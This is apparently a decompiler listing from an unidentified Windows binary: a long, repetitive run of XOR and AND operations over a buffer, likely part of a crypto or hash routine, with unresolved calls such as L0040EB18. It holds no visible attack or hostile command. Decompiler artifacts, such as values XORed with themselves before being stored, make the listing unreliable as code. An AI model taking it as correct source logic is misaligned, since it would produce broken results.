                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1756 + _t1590 * 8 - 0x7c);
                                                                                                                                                                                                                                                                  					_t1591 = _v16;
                                                                                                                                                                                                                                                                  					_t1757 = _a4;
                                                                                                                                                                                                                                                                  					_t1413 = _v16;
                                                                                                                                                                                                                                                                  					_t2050 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1757 + _t1591 * 8 - 0x88) &  *(_t2050 + _t1413 * 8 - 0xa0) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1757 + _t1591 * 8 - 0x84) &  *(_t2050 + _t1413 * 8 - 0x9c) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1758 = _v16;
                                                                                                                                                                                                                                                                  					_t1414 = _a4;
                                                                                                                                                                                                                                                                  					_t1595 = _v16;
                                                                                                                                                                                                                                                                  					_t2051 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1414 + _t1758 * 8 - 0xf0) &  *(_t2051 + _t1595 * 8 - 0x210) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1414 + _t1758 * 8 - 0xec) &  *(_t2051 + _t1595 * 8 - 0x20c) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1598 = _v16;
                                                                                                                                                                                                                                                                  					_t2052 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2052 + 8 + _t1598 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2052 + 0xc + _t1598 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1599 = _v16;
                                                                                                                                                                                                                                                                  					_t1767 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1767 + _t1599 * 8 - 0x2b8);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1767 + _t1599 * 8 - 0x2b4);
                                                                                                                                                                                                                                                                  					_t1600 = _v16;
                                                                                                                                                                                                                                                                  					_t1768 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1768 + _t1600 * 8 - 0x78);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1768 + _t1600 * 8 - 0x74);
                                                                                                                                                                                                                                                                  					_t1601 = _v16;
                                                                                                                                                                                                                                                                  					_t1769 = _a4;
                                                                                                                                                                                                                                                                  					_t1424 = _v16;
                                                                                                                                                                                                                                                                  					_t2057 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1769 + _t1601 * 8 - 0x80) &  *(_t2057 + _t1424 * 8 - 0x98) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1769 + _t1601 * 8 - 0x7c) &  *(_t2057 + _t1424 * 8 - 0x94) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1770 = _v16;
                                                                                                                                                                                                                                                                  					_t1425 = _a4;
                                                                                                                                                                                                                                                                  					_t1605 = _v16;
                                                                                                                                                                                                                                                                  					_t2058 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1425 + _t1770 * 8 - 0xe8) &  *(_t2058 + _t1605 * 8 - 0x208) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1425 + _t1770 * 8 - 0xe4) &  *(_t2058 + _t1605 * 8 - 0x204) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1608 = _v16;
                                                                                                                                                                                                                                                                  					_t2059 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2059 + 0x10 + _t1608 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2059 + 0x14 + _t1608 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1609 = _v16;
                                                                                                                                                                                                                                                                  					_t1779 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1779 + _t1609 * 8 - 0x2b0);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1779 + _t1609 * 8 - 0x2ac);
                                                                                                                                                                                                                                                                  					_t1610 = _v16;
                                                                                                                                                                                                                                                                  					_t1780 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1780 + _t1610 * 8 - 0x70);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1780 + _t1610 * 8 - 0x6c);
                                                                                                                                                                                                                                                                  					_t1611 = _v16;
                                                                                                                                                                                                                                                                  					_t1781 = _a4;
                                                                                                                                                                                                                                                                  					_t1435 = _v16;
                                                                                                                                                                                                                                                                  					_t2064 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1781 + _t1611 * 8 - 0x78) &  *(_t2064 + _t1435 * 8 - 0x90) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1781 + _t1611 * 8 - 0x74) &  *(_t2064 + _t1435 * 8 - 0x8c) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1782 = _v16;
                                                                                                                                                                                                                                                                  					_t1436 = _a4;
                                                                                                                                                                                                                                                                  					_t1615 = _v16;
                                                                                                                                                                                                                                                                  					_t2065 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1436 + _t1782 * 8 - 0xe0) &  *(_t2065 + _t1615 * 8 - 0x200) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1436 + _t1782 * 8 - 0xdc) &  *(_t2065 + _t1615 * 8 - 0x1fc) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1618 = _v16;
                                                                                                                                                                                                                                                                  					_t2066 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2066 + 0x18 + _t1618 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2066 + 0x1c + _t1618 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1619 = _v16;
                                                                                                                                                                                                                                                                  					_t1791 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1791 + _t1619 * 8 - 0x2a8);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1791 + _t1619 * 8 - 0x2a4);
                                                                                                                                                                                                                                                                  					_t1620 = _v16;
                                                                                                                                                                                                                                                                  					_t1792 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1792 + _t1620 * 8 - 0x68);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1792 + _t1620 * 8 - 0x64);
                                                                                                                                                                                                                                                                  					_t1621 = _v16;
                                                                                                                                                                                                                                                                  					_t1793 = _a4;
                                                                                                                                                                                                                                                                  					_t1446 = _v16;
                                                                                                                                                                                                                                                                  					_t2071 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1793 + _t1621 * 8 - 0x70) &  *(_t2071 + _t1446 * 8 - 0x88) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1793 + _t1621 * 8 - 0x6c) &  *(_t2071 + _t1446 * 8 - 0x84) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1794 = _v16;
                                                                                                                                                                                                                                                                  					_t1447 = _a4;
                                                                                                                                                                                                                                                                  					_t1625 = _v16;
                                                                                                                                                                                                                                                                  					_t2072 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1447 + _t1794 * 8 - 0xd8) &  *(_t2072 + _t1625 * 8 - 0x1f8) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1447 + _t1794 * 8 - 0xd4) &  *(_t2072 + _t1625 * 8 - 0x1f4) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1628 = _v16;
                                                                                                                                                                                                                                                                  					_t2073 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2073 + 0x20 + _t1628 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2073 + 0x24 + _t1628 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1629 = _v16;
                                                                                                                                                                                                                                                                  					_t1803 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1803 + _t1629 * 8 - 0x2a0);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1803 + _t1629 * 8 - 0x29c);
                                                                                                                                                                                                                                                                  					_t1630 = _v16;
                                                                                                                                                                                                                                                                  					_t1804 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1804 + _t1630 * 8 - 0x60);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1804 + _t1630 * 8 - 0x5c);
                                                                                                                                                                                                                                                                  					_t1631 = _v16;
                                                                                                                                                                                                                                                                  					_t1805 = _a4;
                                                                                                                                                                                                                                                                  					_t1457 = _v16;
                                                                                                                                                                                                                                                                  					_t2078 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1805 + _t1631 * 8 - 0x68) &  *(_t2078 + _t1457 * 8 - 0x80) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1805 + _t1631 * 8 - 0x64) &  *(_t2078 + _t1457 * 8 - 0x7c) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1806 = _v16;
                                                                                                                                                                                                                                                                  					_t1458 = _a4;
                                                                                                                                                                                                                                                                  					_t1635 = _v16;
                                                                                                                                                                                                                                                                  					_t2079 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1458 + _t1806 * 8 - 0xd0) &  *(_t2079 + _t1635 * 8 - 0x1f0) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1458 + _t1806 * 8 - 0xcc) &  *(_t2079 + _t1635 * 8 - 0x1ec) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1638 = _v16;
                                                                                                                                                                                                                                                                  					_t2080 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2080 + 0x28 + _t1638 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2080 + 0x2c + _t1638 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1639 = _v16;
                                                                                                                                                                                                                                                                  					_t1815 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1815 + _t1639 * 8 - 0x298);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1815 + _t1639 * 8 - 0x294);
                                                                                                                                                                                                                                                                  					_t1640 = _v16;
                                                                                                                                                                                                                                                                  					_t1816 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1816 + _t1640 * 8 - 0x58);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1816 + _t1640 * 8 - 0x54);
                                                                                                                                                                                                                                                                  					_t1641 = _v16;
                                                                                                                                                                                                                                                                  					_t1817 = _a4;
                                                                                                                                                                                                                                                                  					_t1468 = _v16;
                                                                                                                                                                                                                                                                  					_t2085 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1817 + _t1641 * 8 - 0x60) &  *(_t2085 + _t1468 * 8 - 0x78) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1817 + _t1641 * 8 - 0x5c) &  *(_t2085 + _t1468 * 8 - 0x74) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1818 = _v16;
                                                                                                                                                                                                                                                                  					_t1469 = _a4;
                                                                                                                                                                                                                                                                  					_t1645 = _v16;
                                                                                                                                                                                                                                                                  					_t2086 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1469 + _t1818 * 8 - 0xc8) &  *(_t2086 + _t1645 * 8 - 0x1e8) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1469 + _t1818 * 8 - 0xc4) &  *(_t2086 + _t1645 * 8 - 0x1e4) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1648 = _v16;
                                                                                                                                                                                                                                                                  					_t2087 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2087 + 0x30 + _t1648 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2087 + 0x34 + _t1648 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1649 = _v16;
                                                                                                                                                                                                                                                                  					_t1827 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1827 + _t1649 * 8 - 0x290);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1827 + _t1649 * 8 - 0x28c);
                                                                                                                                                                                                                                                                  					_t1650 = _v16;
                                                                                                                                                                                                                                                                  					_t1828 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1828 + _t1650 * 8 - 0x50);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1828 + _t1650 * 8 - 0x4c);
                                                                                                                                                                                                                                                                  					_t1651 = _v16;
                                                                                                                                                                                                                                                                  					_t1829 = _a4;
                                                                                                                                                                                                                                                                  					_t1479 = _v16;
                                                                                                                                                                                                                                                                  					_t2092 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1829 + _t1651 * 8 - 0x58) &  *(_t2092 + _t1479 * 8 - 0x70) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1829 + _t1651 * 8 - 0x54) &  *(_t2092 + _t1479 * 8 - 0x6c) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1830 = _v16;
                                                                                                                                                                                                                                                                  					_t1480 = _a4;
                                                                                                                                                                                                                                                                  					_t1655 = _v16;
                                                                                                                                                                                                                                                                  					_t2093 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1480 + _t1830 * 8 - 0xc0) &  *(_t2093 + _t1655 * 8 - 0x1e0) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1480 + _t1830 * 8 - 0xbc) &  *(_t2093 + _t1655 * 8 - 0x1dc) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1658 = _v16;
                                                                                                                                                                                                                                                                  					_t2094 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2094 + 0x38 + _t1658 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2094 + 0x3c + _t1658 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1659 = _v16;
                                                                                                                                                                                                                                                                  					_t1839 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1839 + _t1659 * 8 - 0x288);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1839 + _t1659 * 8 - 0x284);
                                                                                                                                                                                                                                                                  					_t1660 = _v16;
                                                                                                                                                                                                                                                                  					_t1840 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1840 + _t1660 * 8 - 0x48);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1840 + _t1660 * 8 - 0x44);
                                                                                                                                                                                                                                                                  					_t1661 = _v16;
                                                                                                                                                                                                                                                                  					_t1841 = _a4;
                                                                                                                                                                                                                                                                  					_t1490 = _v16;
                                                                                                                                                                                                                                                                  					_t2099 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1841 + _t1661 * 8 - 0x50) &  *(_t2099 + _t1490 * 8 - 0x68) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1841 + _t1661 * 8 - 0x4c) &  *(_t2099 + _t1490 * 8 - 0x64) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1842 = _v16;
                                                                                                                                                                                                                                                                  					_t1491 = _a4;
                                                                                                                                                                                                                                                                  					_t1665 = _v16;
                                                                                                                                                                                                                                                                  					_t2100 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1491 + _t1842 * 8 - 0xb8) &  *(_t2100 + _t1665 * 8 - 0x1d8) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1491 + _t1842 * 8 - 0xb4) &  *(_t2100 + _t1665 * 8 - 0x1d4) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1668 = _v16;
                                                                                                                                                                                                                                                                  					_t2101 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2101 + 0x40 + _t1668 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2101 + 0x44 + _t1668 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1669 = _v16;
                                                                                                                                                                                                                                                                  					_t1851 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1851 + _t1669 * 8 - 0x280);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1851 + _t1669 * 8 - 0x27c);
                                                                                                                                                                                                                                                                  					_t1670 = _v16;
                                                                                                                                                                                                                                                                  					_t1852 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1852 + _t1670 * 8 - 0x40);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1852 + _t1670 * 8 - 0x3c);
                                                                                                                                                                                                                                                                  					_t1671 = _v16;
                                                                                                                                                                                                                                                                  					_t1853 = _a4;
                                                                                                                                                                                                                                                                  					_t1501 = _v16;
                                                                                                                                                                                                                                                                  					_t2106 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1853 + _t1671 * 8 - 0x48) &  *(_t2106 + _t1501 * 8 - 0x60) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1853 + _t1671 * 8 - 0x44) &  *(_t2106 + _t1501 * 8 - 0x5c) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1854 = _v16;
                                                                                                                                                                                                                                                                  					_t1502 = _a4;
                                                                                                                                                                                                                                                                  					_t1675 = _v16;
                                                                                                                                                                                                                                                                  					_t2107 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1502 + _t1854 * 8 - 0xb0) &  *(_t2107 + _t1675 * 8 - 0x1d0) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1502 + _t1854 * 8 - 0xac) &  *(_t2107 + _t1675 * 8 - 0x1cc) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1678 = _v16;
                                                                                                                                                                                                                                                                  					_t2108 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2108 + 0x48 + _t1678 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2108 + 0x4c + _t1678 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1679 = _v16;
                                                                                                                                                                                                                                                                  					_t1863 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1863 + _t1679 * 8 - 0x278);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1863 + _t1679 * 8 - 0x274);
                                                                                                                                                                                                                                                                  					_t1680 = _v16;
                                                                                                                                                                                                                                                                  					_t1864 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1864 + _t1680 * 8 - 0x38);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1864 + _t1680 * 8 - 0x34);
                                                                                                                                                                                                                                                                  					_t1681 = _v16;
                                                                                                                                                                                                                                                                  					_t1865 = _a4;
                                                                                                                                                                                                                                                                  					_t1512 = _v16;
                                                                                                                                                                                                                                                                  					_t2113 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1865 + _t1681 * 8 - 0x40) &  *(_t2113 + _t1512 * 8 - 0x58) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1865 + _t1681 * 8 - 0x3c) &  *(_t2113 + _t1512 * 8 - 0x54) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1866 = _v16;
                                                                                                                                                                                                                                                                  					_t1513 = _a4;
                                                                                                                                                                                                                                                                  					_t1685 = _v16;
                                                                                                                                                                                                                                                                  					_t2114 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1513 + _t1866 * 8 - 0xa8) &  *(_t2114 + _t1685 * 8 - 0x1c8) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1513 + _t1866 * 8 - 0xa4) &  *(_t2114 + _t1685 * 8 - 0x1c4) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1688 = _v16;
                                                                                                                                                                                                                                                                  					_t2115 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2115 + 0x50 + _t1688 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2115 + 0x54 + _t1688 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1689 = _v16;
                                                                                                                                                                                                                                                                  					_t1875 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1875 + _t1689 * 8 - 0x270);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1875 + _t1689 * 8 - 0x26c);
                                                                                                                                                                                                                                                                  					_t1690 = _v16;
                                                                                                                                                                                                                                                                  					_t1876 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1876 + _t1690 * 8 - 0x30);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1876 + _t1690 * 8 - 0x2c);
                                                                                                                                                                                                                                                                  					_t1691 = _v16;
                                                                                                                                                                                                                                                                  					_t1877 = _a4;
                                                                                                                                                                                                                                                                  					_t1523 = _v16;
                                                                                                                                                                                                                                                                  					_t2120 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1877 + _t1691 * 8 - 0x38) &  *(_t2120 + _t1523 * 8 - 0x50) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1877 + _t1691 * 8 - 0x34) &  *(_t2120 + _t1523 * 8 - 0x4c) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1878 = _v16;
                                                                                                                                                                                                                                                                  					_t1524 = _a4;
                                                                                                                                                                                                                                                                  					_t1695 = _v16;
                                                                                                                                                                                                                                                                  					_t2121 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1524 + _t1878 * 8 - 0xa0) &  *(_t2121 + _t1695 * 8 - 0x1c0) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1524 + _t1878 * 8 - 0x9c) &  *(_t2121 + _t1695 * 8 - 0x1bc) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1698 = _v16;
                                                                                                                                                                                                                                                                  					_t2122 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2122 + 0x58 + _t1698 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2122 + 0x5c + _t1698 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1699 = _v16;
                                                                                                                                                                                                                                                                  					_t1887 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1887 + _t1699 * 8 - 0x268);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1887 + _t1699 * 8 - 0x264);
                                                                                                                                                                                                                                                                  					_t1700 = _v16;
                                                                                                                                                                                                                                                                  					_t1888 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1888 + _t1700 * 8 - 0x28);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1888 + _t1700 * 8 - 0x24);
                                                                                                                                                                                                                                                                  					_t1701 = _v16;
                                                                                                                                                                                                                                                                  					_t1889 = _a4;
                                                                                                                                                                                                                                                                  					_t1534 = _v16;
                                                                                                                                                                                                                                                                  					_t2127 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1889 + _t1701 * 8 - 0x30) &  *(_t2127 + _t1534 * 8 - 0x48) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1889 + _t1701 * 8 - 0x2c) &  *(_t2127 + _t1534 * 8 - 0x44) ^ _v8;
                                                                                                                                                                                                                                                                  					_t1890 = _v16;
                                                                                                                                                                                                                                                                  					_t1535 = _a4;
                                                                                                                                                                                                                                                                  					_t1705 = _v16;
                                                                                                                                                                                                                                                                  					_t2128 = _a4;
                                                                                                                                                                                                                                                                  					_v12 =  *(_t1535 + _t1890 * 8 - 0x98) &  *(_t2128 + _t1705 * 8 - 0x1b8) ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 =  *(_t1535 + _t1890 * 8 - 0x94) &  *(_t2128 + _t1705 * 8 - 0x1b4) ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB18();
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					L0040EB1E();
                                                                                                                                                                                                                                                                  					_t1708 = _v16;
                                                                                                                                                                                                                                                                  					_t2129 = _a4;
                                                                                                                                                                                                                                                                  					 *(_t2129 + 0x60 + _t1708 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                  					 *(_t2129 + 0x64 + _t1708 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                  					_v12 = _v28;
                                                                                                                                                                                                                                                                  					_v8 = _v24;
                                                                                                                                                                                                                                                                  					_t1709 = _v16;
                                                                                                                                                                                                                                                                  					_t1899 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1899 + _t1709 * 8 - 0x260);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1899 + _t1709 * 8 - 0x25c);
                                                                                                                                                                                                                                                                  					_t1710 = _v16;
                                                                                                                                                                                                                                                                  					_t1900 = _a4;
                                                                                                                                                                                                                                                                  					_v12 = _v12 ^  *(_t1900 + _t1710 * 8 - 0x20);
                                                                                                                                                                                                                                                                  					_v8 = _v8 ^  *(_t1900 + _t1710 * 8 - 0x1c);
                                                                                                                                                                                                                                                                  					_t1711 = _v16;
                                                                                                                                                                                                                                                                  					_t1901 = _a4;
